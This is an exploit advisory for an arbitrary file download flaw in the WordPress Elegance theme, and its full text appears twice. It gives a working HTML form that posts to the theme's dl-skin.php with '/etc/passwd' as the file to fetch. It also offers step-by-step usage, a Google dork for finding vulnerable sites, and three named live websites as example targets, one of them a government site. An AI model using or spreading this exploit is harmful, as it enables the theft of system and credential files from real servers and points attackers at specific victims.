Description:
This exploit allows attacker to download any writable file from the server
Usage info:
Put the path of the file in the file's field of the exploit ,then click "Download" button then you get the file directly
############################################################################
# Title : Wordpress Theme Elegance Arbitrary File Download Vulnerability
# Author : Aloulou
# Date : 19/06/2014
# Facebook : http://www.facebook.com/Aloulou.TN
# Email: aloulou@alquds.com
# Vendor : www.wordpress.org
# Google Dork : inurl:/wp-content/themes/elegance
# Tested on : Linux
############################################################################
Exploit:
<html>
<body>
<form action="http://127.0.0.1/wp-content/themes/elegance/lib/scripts/dl-skin.php" method="POST">
<b>File</b>:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
<input type="submit" value=Download>
</form>
</body>
</html>
Examples:
http://www.floridapace.gov
http://www.eglevskyballet.org
http://mudtitanrun.com
# Greeting to : Tunisia , CyberPink , AnonBoy and All muslims
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
This exploit allows attacker to download any writable file from the server
Usage info:
Put the path of the file in the file's field of the exploit ,then click "Download" button then you get the file directly
############################################################################
# Title : Wordpress Theme Elegance Arbitrary File Download Vulnerability
# Author : Aloulou
# Date : 19/06/2014
# Facebook : http://www.facebook.com/Aloulou.TN
# Email: aloulou@alquds.com
# Vendor : www.wordpress.org
# Google Dork : inurl:/wp-content/themes/elegance
# Tested on : Linux
############################################################################
Exploit:
<html>
<body>
<form action="http://127.0.0.1/wp-content/themes/elegance/lib/scripts/dl-skin.php" method="POST">
<b>File</b>:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
<input type="submit" value=Download>
</form>
</body>
</html>
Examples:
http://www.floridapace.gov
http://www.eglevskyballet.org
http://mudtitanrun.com
# Greeting to : Tunisia , CyberPink , AnonBoy and All muslims
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information